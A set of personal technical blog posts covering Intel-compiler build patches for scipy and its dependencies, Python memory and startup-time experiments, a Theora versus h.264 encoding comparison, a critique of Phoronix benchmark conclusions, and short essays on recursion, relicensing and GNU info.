# GEOS → http://download.osgeo.org/geos/geos-3.3.2.tar.bz2

cd geos*/ 
./configure --prefix=/home/ws/babenhau/
make
make check
make install 
cd ..

# basemap

easy_install --prefix /home/ws/babenhau/python basemap
# fails but should now have all dependencies.

cd basemap-*/

python setup.py build -c intel install --prefix=/home/ws/babenhau/python

cd ..

6 Appendix

6.1 All patches inline

To ease usage and upstreaming of my fixes, I include all the patches below, so you can find them directly in this text instead of having to browse external textfiles.

6.1.1 SuiteSparse-umfpack.diff

--- SuiteSparse/UMFPACK/Lib/GNUmakefile 2009-11-11 21:09:54.000000000 +0100
+++ SuiteSparse/UMFPACK/Lib/GNUmakefile 2011-09-09 14:18:57.000000000 +0200
@@ -9,7 +9,7 @@
 C = $(CC) $(CFLAGS) $(UMFPACK_CONFIG) \
     -I../Include -I../Source -I../../AMD/Include -I../../UFconfig \
     -I../../CCOLAMD/Include -I../../CAMD/Include -I../../CHOLMOD/Include \
-    -I../../metis-4.0/Lib -I../../COLAMD/Include
+    -I../../COLAMD/Include

 #-------------------------------------------------------------------------------
 # source files

6.1.2 SuiteSparse.diff

--- SuiteSparse/UFconfig/UFconfig.mk    2011-09-09 13:14:03.000000000 +0200
+++ SuiteSparse/UFconfig/UFconfig.mk    2011-09-09 13:15:03.000000000 +0200
@@ -33,11 +33,11 @@
 # C compiler and compiler flags:  These will normally not give you optimal
 # performance.  You should select the optimization parameters that are best
 # for your system.  On Linux, use "CFLAGS = -O3 -fexceptions" for example.
-CC = cc
-CFLAGS = -O3 -fexceptions
+CC = icc
+CFLAGS = -O3 -xHost -fPIC -openmp -vec_report=0

 # C++ compiler (also uses CFLAGS)
-CPLUSPLUS = g++
+CPLUSPLUS = icpc

 # ranlib, and ar, for generating libraries
 RANLIB = ranlib
@@ -49,8 +49,8 @@
 MV = mv -f

 # Fortran compiler (not normally required)
-F77 = f77
-F77FLAGS = -O
+F77 = ifort
+F77FLAGS = -O3 -xHost
 F77LIB =

 # C and Fortran libraries
@@ -132,13 +132,13 @@
 # The path is relative to where it is used, in CHOLMOD/Lib, CHOLMOD/MATLAB, etc.
 # You may wish to use an absolute path.  METIS is optional.  Compile
 # CHOLMOD with -DNPARTITION if you do not wish to use METIS.
-METIS_PATH = ../../metis-4.0
-METIS = ../../metis-4.0/libmetis.a
+# METIS_PATH = ../../metis-4.0
+# METIS = ../../metis-4.0/libmetis.a

 # If you use CHOLMOD_CONFIG = -DNPARTITION then you must use the following
 # options:
-# METIS_PATH =
-# METIS =
+METIS_PATH =
+METIS =

 #------------------------------------------------------------------------------
 # UMFPACK configuration:
@@ -194,7 +194,7 @@
 # -DNSUNPERF       for Solaris only.  If defined, do not use the Sun
 #          Performance Library

-CHOLMOD_CONFIG =
+CHOLMOD_CONFIG = -DNPARTITION

 #------------------------------------------------------------------------------
 # SuiteSparseQR configuration:

6.1.3 hdf-fix-configure.ac.diff (fixes a bug but still contains another known bug - see Known Bugs!)

--- configure.ac    2012-03-01 15:00:28.000000000 +0100
+++ configure.ac    2012-03-01 15:00:40.000000000 +0100
@@ -815,7 +815,7 @@
 dnl Report anything stripped as a flag in CFLAGS and 
 dnl only the compiler in CC_VERSION.
 CC_NOFLAGS=`echo $CC | sed 's/ -.*//'`
-CFLAGS_TO_ADD=`echo $CC | grep - | sed 's/.* -/-/'`
+CFLAGS_TO_ADD=`echo $CC | grep \ - | sed 's/.* -/-/'`
 if test -n $CFLAGS_TO_ADD; then
   CFLAGS="$CFLAGS_TO_ADD$CFLAGS"
 fi

6.1.4 lapacke-ifort.diff

--- lapacke/make.intel.old  2011-10-05 13:24:14.000000000 +0200
+++ lapacke/make.intel  2011-10-05 16:17:00.000000000 +0200
@@ -56,7 +56,7 @@
 # Ensure that the libraries have the same data model (LP64/ILP64).
 #
 LAPACKE = lapacke.a
-LIBS = ../../../lapack-3.3.1/lapack_LINUX.a ../../../blas/blas_LINUX.a -lm
+LIBS = /opt/intel/Compiler/11.1/080/lib/intel64/libifcore.a ../../../lapack-3.2.1/lapack.a ../../../lapack-3.2.1/blas.a -lm -ifcore
 #
 #  The archiver and the flag(s) to use when building archive (library)
 #  If your system has no ranlib, set RANLIB = echo.

6.1.5 matplotlib-add-icc-support.diff

diff -r 38c2a32c56ae matplotlib-1.1.0/setup.py
--- a/matplotlib-1.1.0/setup.py Fri Mar 02 12:29:47 2012 +0100
+++ b/matplotlib-1.1.0/setup.py Fri Mar 02 12:30:39 2012 +0100
@@ -31,6 +31,13 @@
 if major==2 and minor1<4 or major<2:
     raise SystemExit("""matplotlib requires Python 2.4 or later.""")

+if "intel" in sys.argv or "icc" in sys.argv:
+    try: # make it compile with the intel compiler
+        from numpy.distutils import intelccompiler
+    except ImportError:
+        print "Compiling with the intel compiler requires numpy."
+        raise
+
 import glob
 from distutils.core import setup
 from setupext import build_agg, build_gtkagg, build_tkagg,\

6.1.6 netcdf-patch1.diff

--- netcdf-4.1.3/fortran/ncfortran.h    2011-07-01 01:22:22.000000000 +0200
+++ netcdf-4.1.3/fortran/ncfortran.h    2011-09-14 14:56:03.000000000 +0200
@@ -658,7 +658,7 @@
  * The following is for f2c-support only.
  */

-#if defined(f2cFortran) && !defined(pgiFortran) && !defined(gFortran)
+#if defined(f2cFortran) && !defined(pgiFortran) && !defined(gFortran) &&!defined(__INTEL_COMPILER)

 /*
  * The f2c(1) utility on BSD/OS and Linux systems adds an additional

6.1.7 netcdf-patch2.diff

--- netcdf-4.1.3/nf_test/fortlib.c  2011-09-14 14:58:47.000000000 +0200
+++ netcdf-4.1.3/nf_test/fortlib.c  2011-09-14 14:58:38.000000000 +0200
@@ -14,7 +14,7 @@
 #include "../fortran/ncfortran.h"


-#if defined(f2cFortran) && !defined(pgiFortran) && !defined(gFortran)
+#if defined(f2cFortran) && !defined(pgiFortran) && !defined(gFortran) &&!defined(__INTEL_COMPILER)
 /*
  * The f2c(1) utility on BSD/OS and Linux systems adds an additional
  * underscore suffix (besides the usual one) to global names that have

6.1.8 numpy-icc.diff

--- numpy/numpy/distutils/intelccompiler.py 2011-09-08 14:14:03.000000000 +0200
+++ numpy/numpy/distutils/intelccompiler.py 2011-09-08 14:20:37.000000000 +0200
@@ -30,11 +30,11 @@
     """ A modified Intel x86_64 compiler compatible with a 64bit gcc built Python.
     """
     compiler_type = 'intelem'
-    cc_exe = 'icc -m64 -fPIC'
+    cc_exe = 'icc -m64 -fPIC -xHost -O3'
     cc_args = "-fPIC"
     def __init__ (self, verbose=0, dry_run=0, force=0):
         UnixCCompiler.__init__ (self, verbose,dry_run, force)
-        self.cc_exe = 'icc -m64 -fPIC'
+        self.cc_exe = 'icc -m64 -fPIC -xHost -O3'
         compiler = self.cc_exe
         self.set_executables(compiler=compiler,
                              compiler_so=compiler,

6.1.9 numpy-icpc.diff

--- numpy-1.6.1/numpy/distutils/intelccompiler.py   2011-10-06 16:55:12.000000000 +0200
+++ numpy-1.6.1/numpy/distutils/intelccompiler.py   2011-10-10 10:26:14.000000000 +0200
@@ -10,11 +10,13 @@
     def __init__ (self, verbose=0, dry_run=0, force=0):
         UnixCCompiler.__init__ (self, verbose,dry_run, force)
         self.cc_exe = 'icc -fPIC'
+   self.cxx_exe = 'icpc -fPIC'
         compiler = self.cc_exe
+   compiler_cxx = self.cxx_exe
         self.set_executables(compiler=compiler,
                              compiler_so=compiler,
-                             compiler_cxx=compiler,
-                             linker_exe=compiler,
+                             compiler_cxx=compiler_cxx,
+                             linker_exe=compiler_cxx,
                              linker_so=compiler + ' -shared')

 class IntelItaniumCCompiler(IntelCCompiler):

6.1.10 numpy-ifort.diff

--- numpy-1.6.1/numpy/distutils/fcompiler/intel.py.old  2011-10-10 17:52:34.000000000 +0200
+++ numpy-1.6.1/numpy/distutils/fcompiler/intel.py  2011-10-10 17:53:51.000000000 +0200
@@ -32,7 +32,7 @@
     executables = {
         'version_cmd'  : None,          # set by update_executables
         'compiler_f77' : [None, "-72", "-w90", "-fPIC", "-w95"],
-        'compiler_f90' : [None],
+        'compiler_f90' : [None, "-fPIC"],
         'compiler_fix' : [None, "-FI"],
         'linker_so'    : ["<F90>", "-shared"],
         'archiver'     : ["ar", "-cr"],
@@ -129,7 +129,7 @@
         'version_cmd'  : None,
         'compiler_f77' : [None, "-FI", "-w90", "-fPIC", "-w95"],
         'compiler_fix' : [None, "-FI"],
-        'compiler_f90' : [None],
+        'compiler_f90' : [None, "-fPIC"],
         'linker_so'    : ['<F90>', "-shared"],
         'archiver'     : ["ar", "-cr"],
         'ranlib'       : ["ranlib"]
@@ -148,7 +148,7 @@
         'version_cmd'  : None,
         'compiler_f77' : [None, "-FI", "-w90", "-fPIC", "-w95"],
         'compiler_fix' : [None, "-FI"],
-        'compiler_f90' : [None],
+        'compiler_f90' : [None, "-fPIC"],
         'linker_so'    : ['<F90>', "-shared"],
         'archiver'     : ["ar", "-cr"],
         'ranlib'       : ["ranlib"]
@@ -180,7 +180,7 @@
         'version_cmd'  : None,
         'compiler_f77' : [None,"-FI","-w90", "-fPIC","-w95"],
         'compiler_fix' : [None,"-FI","-4L72","-w"],
-        'compiler_f90' : [None],
+        'compiler_f90' : [None, "-fPIC"],
         'linker_so'    : ['<F90>', "-shared"],
         'archiver'     : [ar_exe, "/verbose", "/OUT:"],
         'ranlib'       : None
@@ -232,7 +232,7 @@
         'version_cmd'  : None,
         'compiler_f77' : [None,"-FI","-w90", "-fPIC","-w95"],
         'compiler_fix' : [None,"-FI","-4L72","-w"],
-        'compiler_f90' : [None],
+        'compiler_f90' : [None, "-fPIC"],
         'linker_so'    : ['<F90>',"-shared"],
         'archiver'     : [ar_exe, "/verbose", "/OUT:"],
         'ranlib'       : None

6.1.11 pynio-fix-no-grib.diff

--- PyNIO-1.4.1/Nio.py  2011-09-14 16:00:13.000000000 +0200
+++ PyNIO-1.4.1/Nio.py  2011-09-14 16:00:18.000000000 +0200
@@ -98,7 +98,7 @@
         if ncarg_dir == None or not os.path.exists(ncarg_dir) \
           or not os.path.exists(os.path.join(ncarg_dir,"lib","ncarg")):
             if not __formats__['grib2']:
-                return None
+                return "" # "", because an env variable has to be a string.
             else:
                 print "No path found to PyNIO/ncarg data directory and no usable NCARG installation found"
                 sys.exit()

6.1.12 scipy-qhull-icc.diff

--- scipy/scipy/spatial/qhull/src/qhull_a.h 2011-02-27 11:57:03.000000000 +0100
+++ scipy/scipy/spatial/qhull/src/qhull_a.h 2011-09-09 15:42:12.000000000 +0200
@@ -102,13 +102,13 @@
 #elif defined(__MWERKS__) && defined(__INTEL__)
 #   define QHULL_OS_WIN
 #endif
-#if defined(__INTEL_COMPILER) && !defined(QHULL_OS_WIN)
-template <typename T>
-inline void qhullUnused(T &x) { (void)x; }
-#  define QHULL_UNUSED(x) qhullUnused(x);
-#else
+/*#if defined(__INTEL_COMPILER) && !defined(QHULL_OS_WIN)*/
+/*template <typename T>*/
+/*inline void qhullUnused(T &x) { (void)x; }*/
+/*#  define QHULL_UNUSED(x) qhullUnused(x);*/
+/*#else*/
 #  define QHULL_UNUSED(x) (void)x;
-#endif
+*/#endif*/

 /***** -libqhull.c prototypes (alphabetical after qhull) ********************/

6.1.13 scipy-qhull-icc2.diff

--- scipy/scipy/spatial/qhull/src/qhull_a.h 2011-09-09 15:43:54.000000000 +0200
+++ scipy/scipy/spatial/qhull/src/qhull_a.h 2011-09-09 15:45:17.000000000 +0200
@@ -102,13 +102,7 @@
 #elif defined(__MWERKS__) && defined(__INTEL__)
 #   define QHULL_OS_WIN
 #endif
-/*#if defined(__INTEL_COMPILER) && !defined(QHULL_OS_WIN)*/
-/*template <typename T>*/
-/*inline void qhullUnused(T &x) { (void)x; }*/
-/*#  define QHULL_UNUSED(x) qhullUnused(x);*/
-/*#else*/
 #  define QHULL_UNUSED(x) (void)x;
-*/#endif*/

 /***** -libqhull.c prototypes (alphabetical after qhull) ********************/

6.1.14 scipy-spatial-lifcore.diff

--- scipy-0.9.0/scipy/spatial/setup.py  2011-10-10 17:11:23.000000000 +0200
+++ scipy-0.9.0/scipy/spatial/setup.py  2011-10-10 17:11:09.000000000 +0200
@@ -22,6 +22,8 @@
                                      get_numpy_include_dirs()],
                        # XXX: GCC dependency!
                        #extra_compiler_args=['-fno-strict-aliasing'],
+                       # XXX intel compiler dependency
+                       extra_compiler_args=['-lifcore'],
                        )

     lapack = dict(get_info('lapack_opt'))

7 Summary

I hope this helps someone out there saving some time - or even better: improving the upstream projects. At least it should be a nice reference for all who need to get scipy working on not-quite-supported architectures.

Happy Hacking!

Footnotes:

1

: Actually I already wanted to publish that script more than a year ago, but time flies and there’s always stuff to do. But at least I now managed to get it done.

Author: Arne Babenhauserheide

Created: 2013-09-26 Do

Emacs 24.3.1 (Org mode 8.0.2)

Validate XHTML 1.0

AnhangGröße
2013-09-26-Do-installing-scipy-and-matplotlib-on-a-bare-cluster-with-the-intel-compiler.org29.2 KB

JSON will bite us badly

JSON, the javascript object notation format, is everywhere nowadays. But there are 3 facts which will challenge its dominance.

  1. CPU cores are not getting much faster.
  2. You can rent VMs per core, and you pay per core.
  3. The network is still getting faster and cheaper, and HTTP/2 reduces the minimum cost per file.

Due to these changes, servers will become CPU bound again, and basic data structures on the web will become much more relevant. But the most efficient parsing of JSON requires guessing the final data structure while reading the data.

Therefore the changing costs will bring a comeback for binary data structures, and WebAssembly will provide efficient parsers and emitters in the clients.

Look at a typical website and count how much of the dynamic data it uses is structured data. Due to this I expect that 5 years from now, there will be celebrity talks with titles like

Scaling 10x higher with streams of structured data.

(And yes, that tech communication often works like this is a problem.)

If you have deep-rooted doubts, have a look at Towards a JavaScript Binary AST, which convinced me to finally publish this article.

(and parsing JSON is a minefield)

Memory requirement of Python datastructures: numpy array, list of floats and inner array

Easily answering the question: “How much space does this need?”

Intro

We just had the problem to find out whether a given dataset will be shareable without complex trickery. So we took the easiest road and checked the memory requirements of the datastructure.

If you have such a need, there’s always a first stop: Fire up the interpreter and try it out.

The test

We just created a three dimensional numpy array of floats and then looked at the memory requirement in the system monitor - conveniently bound to CTRL-ESC in KDE. By making the array big enough we can ignore all constant costs and directly get the cost per stored value by dividing the total memory of the process by the number of values.

All our tests are done in Python3.

Numpy

For numpy we just create an array of random values cast to floats:

import numpy as np
a = np.array(np.random.random((100, 100, 10000)), dtype="float")

Also we tested what happens when we use "f4" and "f2" instead of "float" as dtype in numpy.

Native lists

For the native lists, we use the same array, but convert it to a list of lists of lists:

import numpy as np
a = [[[float(i) for i in j] for j in k] 
     for k in list(np.array(np.random.random((100, 100, 10000)), dtype="float"))]

Array module

Instead of using the full-blown numpy, we can also turn the inner list into an array.

import numpy as np
a = [[array.array("d", [float(i) for i in j]) for j in k] 
     for k in list(np.array(np.random.random((100, 100, 10000)), dtype="float"))]

The results

With a numpy array we need roughly 8 Byte per float. A linked list however requires roughly 32 Bytes per float. So switching from native Python to numpy reduces the required memory per floating point value by factor 4.

Using an inner array (via array module) instead of the innermost list provides roughly the same gains.

I would have expected factor 3: The value plus a pointer to the next and to the previous entry.

The details are in the following table.

Table 1: Memory requirement of different ways to store values in Python
  total memory per value
list of floats 3216.6 MiB 32.166 Bytes
numpy array of floats 776.7 MiB 7.767 Bytes
np f4 395.2 MiB 3.95 Bytes
np f2 283.4 MiB 2.834 Bytes
inner array 779.1 MiB 7.791 Bytes

This test was conducted on a 64 bit system, so floats are equivalent to doubles.

The scipy documentation provides a list of all the possible dtype definitions cast to C-types.

Summary

In Python large numpy arrays require 4 times less memory than a linked list structure with the same data. Using an inner array from the array module instead of the innermost list provides roughly the same gains.

Ogg Theora and h.264 - which video codec as standard for internet-video?

Links:
- Video encoder comparison - a much more thorough comparision than mine

We had a kinda long discussion on identi.ca about Ogg Theora and h.264, and since we lacked a simple comparision method, I hacked up a quick script to test them.

It uses frames from Big Buck Bunny and outputs the files bbb.ogg and bbb.264 (license: cc by).

The ogg file looks like this:

The h.264 file looks like this: download

Results

What you can see by comparing both is that h.264 wins in terms of raw image quality at the same bitrate (single pass).

So why am I still strongly in favor of Ogg Theora?

The reason is simple:

Due to licensing costs of h.264 (a few millions per year, due from 2015 onwards) making h.264 the standard for internet video would have the effect that only big companies would be able to make a video enabled browser - or we would get a kind of video tax for free software: if you want to view internet video with free software, you have to pay for the right to use the x264 library (else the developers couldn't cough up the money to pay for the parent license). And noone but the main developers and huge corporations could distribute the x264 library, because they’d have to pay license fees for that.

And noone could hack on the browser or library and distribute the changed version, so the whole idea of free software would be led ad absurdum. It wouldn't matter that all code would be free licensed, since only those with a h.264 patent license could change it.

So this post boils down to a simple message:

“Support !theora against h.264 and #flash [as video codec for the web]. Otherwise only big companies will be able to write video browsers - or we get a h.264 tax on !fs”

Theoras raw quality may still be worse, but the license costs and their implications provide very clear reasons for supporting Theora - which in my view are far more important than raw technical stuff.

The test-script

for k in {0..1}
     do for i in {0..9}
         do for j in {0..9}
             do
wget http://media.xiph.org/BBB/BBB-360-png/big_buck_bunny_00$k$i$j.png
         done
     done
done

mplayer -vo yuv4mpeg -ao null -nosound mf://*png -mf fps=50

theora_encoder_example -z 0 --soft-target -V 400 -o bbb.ogg stream.yuv

mencoder stream.yuv -ovc x264 -of rawvideo -o bbb.264 -x264encopts bitrate=400 -aspect 16:9 -nosound -vf scale=640:360,harddup

AnhangGröße
bbb-400bps.ogg212.88 KB
bbb-400bps.264214.39 KB
encode.sh428 Bytes

Phoronix conclusions distort their results, shown with the example of GCC vs. LLVM/Clang On AMD's FX-8350 Vishera

Phoronix recently did a benchmark of GCC vs. LLVM on AMD hardware. Sadly their conclusion did not fit the data they showed. Actually it misrepresented the data so strongly, that I decided to speak up here instead of having my comments disappear in their forums. This post was started on 2013-05-14 and got updates when things changed - first for the better, then for the worse.

Update 3 (the last straw, 2013-11-09): In the recent most blatant attack by Phoronix on copyleft programs - this time openly targeted at GNU - Michael Larabel directly misrepresented a post from Josh Klint to badmouth GDB (Josh confirmed this1). Josh gave a report of his initial experience with GDB in a Kickstarter Update in which he reported some shortcomings he saw in GDB (of which the major gripe is easily resolved with better documentation2) and concluded with “the limitations of GDB are annoying, but I can deal with it. It's very nice to be able to run and debug our editor on Linux”. Michael Larabel only quoted the conclusion up to “annoying” and abused that to support the claim that game developers (in general) call GDB “crap” and for further badmouthing of GDB. With this he provided the straw which I needed to stop reading Phoronix: Michael Larabel is hostile to copyleft and in particular to GNU and he goes as far as rigging test results3 and misrepresenting words of others to further his agenda. I even donated to Phoronix a few times in the past. I guess I won’t do that again, either. I should have learned from the error of the german pirates and should have avoided reading media which is controlled by people who want to destroy what I fight for (sustainable free software).
Update 2 (2013-07-06): But the next went down the drain again… “Of course, LLVM/Clang 3.3 still lacks OpenMP support, so those tests are obviously in favor of GCC.” — I couldn’t find a better way to say that those tests are completely useless while at the same time devaluing OpenMP support as “ignore this result along with all others where GCC wins”…
Update (2013-06-21): The recent report of GCC 4.8 vs. LLVM 3.3 looks much better. Not perfect, but much better.

Taking out the OpenMP benchmarks (where GCC naturally won, because LLVM only processes those tests single-threaded) and the build times (which are irrelevant to the speed of the produced binaries), their benchmark had the following result:

LLVM is slower than GCC by:

  • 10.2% (HMMer)
  • 12.7% (MAFFT)
  • 6.8% (BLAKE2)
  • 9.1% (HIMENO)
  • 42.2% (C-Ray)

With these results (which were clearly visible on their result summary on OpenBenchmarking, Michael Larabel from Phoronix concluded:

» The performance of LLVM/Clang 3.3 for most tests is at least comparable to GCC «

Nobu from their Forums supplied a conclusion which represents the data much better:

» GCC is much faster in anything which uses OpenMP, and moderately faster or equal in anything (except compile times) which doesn't [use OpenMP] «

But Michael from Phoronix did not stop at just ignoring the performance difference between GCC and LLVM. He went on claiming, that

In a few benchmarks LLVM/Clang is faster, particularly when it comes to build times.

And this is blatant reality-distortion which I am very tempted to ascribe to favoritism. LLVM is not “particularly” faster when it comes to build times.

LLVM on AMD FX-8350 Vishera is faster ONLY when it comes to build times!

This was not the first time that I read data-distorting conclusions on Phoronix - and my complaints about that in their forum did not change their actions. So I hope that my post here can help making them aware that deliberately distorting test results is unacceptable.

For my work, compiler performance is actually quite important, because I use programs which run for days or weeks, so 10% runtime reduction can mean saving several days - not counting the cost of using up cluster time.

To fix their blunders, what they would have to do is:

  • Avoiding Benchmarks which only one compiler supports properly (OpenMP).
  • Marking the compile time tests explicitely, so they strongly stand out from the rest, because they measure a completely different parameter than the other tests: Compiler Runtime vs. Performance of the Compiled Binaries.
  • Writing conclusions which actually fit their results.

Their current approach gives a distinct disadvantage to GCC (even for the OpenMP tests, because they convey the notion that if LLVM only had OpenMP, it would be better in everything - which as this test shows is simply false), so the compiler-tests from Phoronix work as covert propaganda against GCC, even in tests where GCC flat-out wins. And I already don’t like open propaganda, but when the propaganda gets masked as objective testing, I actually get angry.

I hope my post here can help move them towards doing proper testing again.

PS: I write so strongly here, because I actually like the tests from Phoronix a lot. I think we need rather more than less testing and their testsuite actually seems to do a good job - when given the right parameters - so seeing Phoronix distorting the tests to a point where they become almost useless (except as political tool against GCC) is a huge disappointment to me.


  1. Josh Klint from Leadwerks confirmed that Phoronix misrepresented his post and wrote a followup-post: » @ArneBab That really wasn't meant to be controversial. I was hoping to provide constructive feedback from the view of an Xcode / VS user.« » Slightly surprised my complaints about GDB are a hot topic. I can make just as many criticisms of other compilers and IDEs.« » The first 24 hours are the best for usability feedback. I figure if they notice a pattern some of those things will be improved.« » GDB Follwup «@Leadwerks, 2:04 AM - 11 Nov 13, 2:10 AM - 11 Nov 13 and @JoshKlint, 2:07 AM - 11 Nov 13, 8:48 PM - 11 Nov 13

  2. The first-impression criticism from Josh Klint was addressed by a Phoronix reader by pointing to the frame command. I do not blame Josh for not knowing all tricks: He wrote a fair account of his initial experience with GDB (and he said later that he wrote the post after less than 24 hours of using GDB, because he considers that the best time to provide feedback) and his experience can serve as constructive criticism to improve tutorials, documentation and the UI of GDB. Sadly his visibility and the possible impact of his work on free software made it possible for Phoronix to abuse a personal report as support for a general badmouthing of the tool. In contrast the full message of Josh Klint ended really positive: Although some annoyances and limitations have been discovered, overall I have found Linux to be a completely viable platform for application development. — Josh Klint, Leadwerks 

  3. I know that rigging of tests is a strong claim. The actions of Michael Larabel deserve being called rigging for three main reasons: (1) Including compile-time data along with runtime performance without clear distinction between both, even though compile-time of the full code is mostly irrelevant when you use a proper build system and compile time and runtime are completely different classes of results, (2) including pointless tests between incomparable setups whose only use is to relativate any weakness of his favorite system and (3) blatantly lying in the summaries (as I show in this article). 

Python for beginning programmers

(written on ohloh for Python)

Since we already have two good reviews from experienced programmers, I'll focus on the area I know about: Python as first language.

My experience:

  • I began to get into coding only a short time ago. I already knew about processes in programs, but not how to get them into code.
  • I wanted to learn C/C++ and failed at general structure. After a while I could do it, but it didn't feel right.
  • I tried my luck with Java and didn't quite get going.
  • Then I tried Python, and got in at once.

Advantages of Python:

  • The structure of programs can be understood easily.
  • The Python interpreter lets you experiment very quickly.
  • You can realize complex programs, but Python also allows for quick and simple scripting.
  • Code written by others is extremely readable.
  • And coding just flows - almost like natural speaking/thinking.

How it looks:

def hello(user):
    print("Hello " + user + "!")
hello("Fan")
# prints Hello Fan! on screen

As a bonus, there is the great open book How to Think Like a Computer Scientist which teaches Python and is being used for teaching Python and Programming at universities.

So I can wholeheartedly recommend Python to beginners in programming, and as the other reviews on Ohloh show, it is also a great language for experienced programmers and seems to be a good language to accompany you in your whole coding life.

PS: Yes, I know about the double meaning of "first language" :)

Recursion wins!

I recently read the little schemer and that got me thinking about recursion and loops.

After starting my programming life with Python, I normally use for-loops to solve problems. But actually they are an inferior mechanism when compared to recursion, if (and only if) the language provides proper syntactic support for that. Since that claim pretty much damns Python on a theoretical level (even though it is still a very good tool in practice and I still love it!), I want to share a simplified version of the code which made me realize this.

Let’s begin with how I would write that code in Python.

res = ""
instring = False
for letter in text:
    if letter = "\"":
        # special conditions for string handling go here
        # lots of special conditions
        # and more special conditions
        # which cannot easily be moved out, 
        # because we cannot skip multiple letters
        # in one step
        instring = not instring
    if instring:
        res += letter
        continue
    # other cases

Did you spot the comment “special conditions go here”? That’s the point which damns for-loops: You cannot easily factor out these special conditions.1 In this example all the complexity is in the variable instring. But depending on the usecase, this could require lots of different states being tracked within the loop and cluttering up the namespace as well as entangling complexity from different parts of the loop.

This is how the same could be done with proper let-recursion:

; first get SRFI-71: multi-value let for syntactic support for what I
; want to do
use-modules : srfi srfi-71

let process-text
    : res ""
      letter : string-take text 1
      unprocessed : string-drop text 1
    when : equal? letter "\""
           let-values 
               ; all the complexity of string-handling is neatly
               ; confined in the helper-function consume-string
               : (to-res next-letter still-unprocessed) : consume-string unprocessed
               process-text
                   string-append res to-res
                   . next-letter
                   . still-unprocessed
    ; other cases

The basic code for recursion is a bit longer, because the new values in the next step of the processing are given explicitly. But it is almost trivial to shell out parts of the loop to another function. It just needs to return the next state of the recursion.

And that’s what consume-string does:

define : consume-string text
    let
        : res ""
          next-letter : string-take text 1
          unprocessed : string-drop text 1
        ; lots of special handling here
        values res next-letter unprocessed

To recite from the Zen of Python:

Explicit is better than implicit.

It’s funny to see how Guile Scheme allows me to follow that principle more thoroughly than Python.

(I love Python, but this is a case where Scheme simply wins - and I’m not afraid to admit that)

PS: Actually I found this technique when thinking about use-cases for multiple return-values of functions.

PPS: This example uses wisp-syntax for the scheme-examples to avoid killing Pythonistas with parens.


  1. While you cannot factor out parts of for loops easily, functions which pass around iterators get pretty close to the expressivity of tail recursion. They might even go a bit further and I already missed them for some scheme code where I needed to generate expressions step by step from a function which always returned an unspecified number of expressions per call. If Python continues to make it easier to use iterators, they could reduce the impact of the points I make in this article. 

AnhangGröße
2014-03-05-Mi-recursion-wins.org3.36 KB

Reducing the Python startup time

The python startup time always nagged me (17-30ms) and I just searched again for a way to reduce it, when I found this:

The Python-Launcher caches GTK imports and forks new processes to reduce the startup time of python GUI programs.

Python-launcher does not solve my problem directly, but it points into an interesting direction: If you create a small daemon which you can contact via the shell to fork a new instance, you might be able to get rid of your startup time.

To get an example of the possibilities, download the python-launcher and socat and do the following:

PYTHONPATH="../lib.linux-x86_64-2.7/" python python-launcher-daemon &
echo pass > 1
for i in {1..100}; do 
    echo 1 | socat STDIN UNIX-CONNECT:/tmp/python-launcher-daemon.socket & 
done

Todo: Adapt it to a given program and remove the GTK stuff. Note the & at the end: Closing the socket connection seems to be slow, so I just don’t wait for socat to finish. Breaks at somewhere over 200 simultaneous connections. Option: Use a datagram socket instead.

The essential trick is to just create a server which opens a socket. Then it reads all the data from the socket. Once it has the data, it forks like the following:

        pid = os.fork()
        if pid:
            return

        signal.signal(signal.SIGPIPE, signal.SIG_DFL)
        signal.signal(signal.SIGCHLD, signal.SIG_DFL)

        glob = dict(__name__="__main__")
        print 'launching', program
        execfile(program, glob, glob)

        raise SystemExit

Running a program that way 100-times took just 0.23 seconds for me so the Python startup time of 17ms got reduced to 2.3ms.

You might have to switch from forking to just executing the code instead of forking if you want to be even faster and the code snippets are small. For example when running the same test without the fork and the signals, 100 executions of the same code took just 0.09s, cutting down the startup time to an impressing 0.9ms - with the cost of no longer running in parallel.

(That’s what I also do with emacsclient… My emacs takes ~30s to start (due to excessive use of additional libraries I added), but emacsclient -c shows up almost instantly.)

I tested the speed by just sending a file with the following snippet to the server:

import time
with open("2", "a") as f:
    f.write(str(time.time()) + "\n")

Note: If your script only needs the included python libraries (batteries) and no custom-installed libs, you can also reduce the startuptime by avoiding site initialization:

python -S [script]

Without -S python -c '' takes 0.018s for me. With -S I am down to

time python -S -c '' → 0.004s. 

Note that you might miss some installed packages that way. This is slower than the daemon method by up to factor 4 (4ms instead of 0.9), but still faster than the default way. Note that cold disk buffers can make the difference much bigger on the first run which is not relevant in this case but very much relevant in general for the impression of startup speed.

PS: I attached the python-launcher 0.1.0 in case its website goes down. License: GPL and MIT; included. This message was originally written at stackoverflow.

AnhangGröße
python-launcher-0.1.0.tar.gz11.11 KB

Relicensing a project from GPLv2 or later to AGPLv3 or later

Switching from GPLv2 or later to AGPL is perfectly legal. But if it is not your own project, it is often considered rude.

This does not relicense the original code, it just sets the license of new code and of the project as a whole. The old code stays GPLv2+, but when it is combined with the new code under AGPLv3 (or later), the combined project will be under AGPLv3 (or later).

However switching from GPL2+ to AGPL3(+) without consensus of all other contributors is considered rude, because it could prevent some of the original authors from using future versions of the project. Their professional use of the project might depend on the loopholes in the copyleft of the GPL.

And the ones you will want most of all as users of your fork of a mostly discontinued project are the original authors, because that can mend the split between the two versions.

This question came up in a continuation of a widely used package whose development seemed to have stalled. The discussion was unfocussed, so I decided to write succinct information for all who might find themselves in a similar situation. I will not link to them, because I do not wish to re-ignite the discussion through an influx of rehashed arguments.

Replacing man with info

GNU info is lightyears ahead of man in terms of features, with sub-pages, clickable links, topic-spanning search, clean html- and latex-export and efficient interactive navigation.

But man pages are still the de-facto standard for getting quick information on a GNU/Linux system.

This guide intends to help you change that for your system. It needs GNU texinfo >= 6.1.

Update: If you prefer vi-keys, adjust the function below to call info --vi-keys instead of plain info. You could then call that function iv

1 Advantages of man-pages over pristine info

I see strong reasons for sticking to man pages instead of info: man pages provide what most people need right away (how to use this?) and they fail fast if the topic is not available.

Their advanced features are mostly hidden away (i.e. checking the Linux programmers manual instead of checking installed programs man 2 stat vs. man stat).

Different from that, the default error state of info is to show you all the other info nodes in which you are really not interested at the moment. And man basename gives you the commandline invocation of the basename utility, while info basename gives you libc "5.8 Finding Tokens in a String".

Also man is fast. And works on most terminals, while info fails at dumb ones.

In short: man does what most users need right now, and if it can’t do that, it simply fails, so the user can try something else. That’s a huge UI advantage, but not due to an inherent limitation of GNU info. GNU Info can do the same, and even defer to man pages for stuff for which there is no info document. It just does not provide that conveniently by default.

2 Fixing GNU info with a simple bash function

GNU Info can provide the same useful interface as man. So let’s make it do that.

